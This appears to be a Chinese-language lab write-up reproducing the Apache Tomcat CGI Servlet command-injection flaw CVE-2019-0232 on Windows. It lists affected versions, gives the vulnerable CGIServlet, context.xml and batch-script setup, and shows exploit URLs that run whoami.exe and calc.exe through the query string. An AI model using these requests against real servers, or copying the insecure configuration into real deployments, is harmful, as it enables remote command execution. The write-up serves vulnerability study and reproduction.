Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

前言

该漏洞只对Windows平台有效,攻击者向CGI Servlet发送请求,可在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中的输入验证错误而存在该漏洞。

 

影响版本

Apache Tomcat 9.0.0.M1 ~ 9.0.17

Apache Tomcat 8.5.0 ~ 8.5.39

Apache Tomcat 7.0.0 ~ 7.0.93

环境搭建

Apache Tomcat安装

下载地址https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/

需要取消掉注释两项

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第1张图片

标签中替换掉

 
        cgi
        org.apache.catalina.servlets.CGIServlet
        
          debug
          0
        
        
          cgiPathPrefix
          WEB-INF/cgi-bin
        
        
          executable
          
        
        5
    

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第2张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第3张图片

接着在conf/context.xml  中的添加privileged="true"语句

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第4张图片

apache-tomcat-8.5.39\webapps\ROOT\WEB-INF下创建一个cgi-bin文件夹,并在文件夹内创建一个bat文件写入

@echo off
echo Content-Type: text/plain
echo.
set off=%~1
%off%

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第5张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第6张图片

现在就可以启动了,已经有漏洞环境的环境了

双击startup.bat后访问127.0.0.1:8080

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第7张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第8张图片

执行命令

http://your-IP:8080/cgi-bin/hello.bat?c:/windows/system32/whoami.exe

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第9张图片

弹计算器

http://your-IP:8080/cgi-bin/hello.bat?c:/windows/system32/calc.exe

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第10张图片

 

你可能感兴趣的:(CVE-2019-0232)